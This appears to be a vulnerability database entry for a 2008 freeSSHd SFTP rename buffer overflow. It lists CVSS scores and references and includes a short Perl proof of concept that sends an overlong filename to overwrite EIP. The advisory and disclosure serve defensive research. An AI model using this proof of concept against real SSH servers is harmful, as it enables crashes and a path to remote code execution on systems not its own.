freeSSHd (stf - rename) Buffer Overflow Vulnerability

2008-10-24 / 2008-10-25
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# freeSSHd (rename) Buffer Overflow Vulnerability # http://www.milw0rm.com/exploits/6800 <-- Same vuln just further research # Registers # EAX 00000000 # ECX 41414141 # EDX 7C9037D8 ntdll.7C9037D8 # EBX 00000000 # ESP 001376BC # EBP 001376DC # ESI 00000000 # EDI 00000000 # EIP 41414141 <-- Pwned # Part of the string is passed to various functions and eventually overwrites EIP. # In order to exploit some patching needs to occur. I've been trying to exploit # this vulnerability on and off in my spare time. # # 0day for 3 months :) # # Written by r0ut3r (writ3r [at] gmail.com) use Net::SSH2; my $user = "root"; my $pass = "yahh"; my $ip = "127.0.0.1"; my $port = 22; my $ssh2 = Net::SSH2->new(); print "[+] Connecting...\n"; $ssh2->connect($ip, $port) || die "[-] Unable to connect!\n"; $ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n"; print "[+] Sending payload\n"; my $junk = 'A' x 317; my $eip = 'BBBB'; print $payload; my $payload = $junk.$eip; my $sftp = $ssh2->sftp(); $sftp->rename($payload, 'B'); print "[+] Sent"; $ssh2->disconnect;

References:

http://www.securityfocus.com/bid/31872
http://www.securityfocus.com/archive/1/archive/1/497746/100/0/threaded
http://www.frsirt.com/english/advisories/2008/2897


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top